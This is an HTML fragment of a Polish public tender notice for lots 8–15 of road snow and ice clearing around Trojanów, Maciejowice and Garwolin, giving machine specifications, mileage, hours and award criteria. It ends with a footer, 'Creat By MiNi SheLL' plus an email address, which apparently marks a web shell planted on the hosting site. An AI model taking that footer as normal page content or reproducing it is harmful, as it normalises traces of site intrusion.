                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>8
                  
                <b>Nazwa: </b>Odśnieżanie dróg ciągnikami rolniczymi lub inną maszyną  na przykład budowlaną z napędem na jedną lub więcej osi o mocy od 80KM do 100KM oraz pługiem do odśnieżania   teren działalności Służby Drogowej w Trojanowie w ilości szt. 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie dróg ciągnikami rolniczymi lub inną maszyną  na przykład budowlaną z napędem na jedną lub więcej osi o mocy od 80KM do 100KM oraz pługiem do odśnieżania   teren działalności Służby Drogowej w Trojanowie w ilości szt. 2
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  1 600 km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>9
                  
                <b>Nazwa: </b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 100KM do 150KM, z napędem 4x4, będącego własnością Wykonawcy teren działalności Służby Drogowej w Trojanowie w ilości szt. 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 100KM do 150KM, z napędem 4x4, będącego własnością Wykonawcy teren działalności Służby Drogowej w Trojanowie w ilości szt. 1
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  850 km, 
Ilość godzin w sezonie zimowym 2016/2017 i sezonie zimowym 2017/2018  70 godz.                <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 150KM, z napędem 4x4, o masie minimum 7 ton będącego własnością Wykonawcy teren działalności Służby Drogowej w Trojanowie w ilości szt. 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 150KM, z napędem 4x4, o masie minimum 7 ton będącego własnością Wykonawcy teren działalności Służby Drogowej w Trojanowie w ilości szt. 1
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  700 km,
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.   <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>Odśnieżanie dróg ciągnikami rolniczymi lub inną maszyną  na przykład budowlaną z napędem na jedną lub więcej osi o mocy od 80KM do 100KM oraz pługiem do odśnieżania   teren działalności Służby Drogowej w Maciejowicach w ilości szt. 2<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie dróg ciągnikami rolniczymi lub inną maszyną  na przykład budowlaną z napędem na jedną lub więcej osi o mocy od 80KM do 100KM oraz pługiem do
odśnieżania   teren działalności Służby Drogowej w Maciejowicach w ilości szt. 2
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  950 km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.    
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>12
                  
                <b>Nazwa: </b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 100KM do 150KM, z napędem 4x4, będącego własnością Wykonawcy teren działalności Służby Drogowej w Maciejowicach w ilości szt. 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 100KM do 150KM, z napędem 4x4, będącego własnością Wykonawcy teren działalności Służby Drogowej w Maciejowicach w ilości szt. 1. 
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  650 km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018 70 godz.       
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>13
                  
                <b>Nazwa: </b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 150KM, z napędem 4x4, o masie minimum 7 ton będącego własnością Wykonawcy teren działalności Służby Drogowej w Maciejowicach w ilości szt. 1<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 150KM, z napędem 4x4, o masie minimum 7 ton będącego własnością Wykonawcy teren działalności Służby Drogowej 
w Maciejowicach w ilości szt. 1
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  250 km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.               
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>14
                  
                <b>Nazwa: </b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu spycharki będącej własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie, Służby Drogowej w Trojanowie, Służby Drogowej w Maciejowicach w ilości szt. 2.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu spycharki będącej własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie, Służby Drogowej w Trojanowie, Służby Drogowej w Maciejowicach w ilości szt. 2.
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018   360 godz.           
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>15
                  
                <b>Nazwa: </b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu równiarki będącej własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie, Służby Drogowej w Trojanowie, Służby Drogowej w Maciejowicach w ilości szt. 1.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Odśnieżanie i zwalczanie naboju lodowego przy użyciu równiarki będącej własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie, Służby Drogowej w Trojanowie, Służby Drogowej w Maciejowicach w ilości szt. 1.
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018   105 godz.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90620000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas podstawienia sprzętu</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com